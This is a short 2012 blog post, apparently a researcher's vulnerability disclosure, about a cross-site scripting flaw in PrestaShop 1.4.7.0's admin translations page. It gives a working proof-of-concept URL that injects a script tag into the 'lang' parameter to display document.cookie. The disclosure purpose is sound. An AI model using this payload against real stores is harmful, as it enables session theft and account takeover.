Sunday, 18 March 2012
[EN] PrestaShop 1.4.7.0 - XSS for logged-in users
# TITLE ....... # PrestaShop 1.4.7.0 XSS for loged-in users ............. #
# DATE ........ # 14.03.2012 ............................................ #
# AUTOHR ...... # http://hauntit.blogspot.com ........................... #
# SOFT LINK ... # http://www.prestashop.com ............................. #
# VERSION ..... # 1.4.7.0 ............................................... #
# TESTED ON ... # LAMP .................................................. #
# ....................................................................... #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
XSS for logged-in users.
#............................................#
# 3. Where is bug :)
Log in as Your 'normal user'.
And enjoy:
http:///prestashop_1.4.7.0/admin12/index.php?tab=AdminTranslations&lang=/*<script>alert(document.cookie)</script>/*&type=front&token=your.token
#............................................#
# 4. More...
- http://www.prestashop.com
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#............................................#
# Best regards
#
Labels:
0day,
exploit,
prestashop,
research,
vulnerability
Subscribe to:
Post Comments (Atom)
In my opinion prestashop is one from the best estore software!
ReplyDeleteYeah I agree Prestashop Themes are really the best template you can use to get a professional looked shopping website. The good thing about Prestashop it's open-source and customizable.
ReplyDelete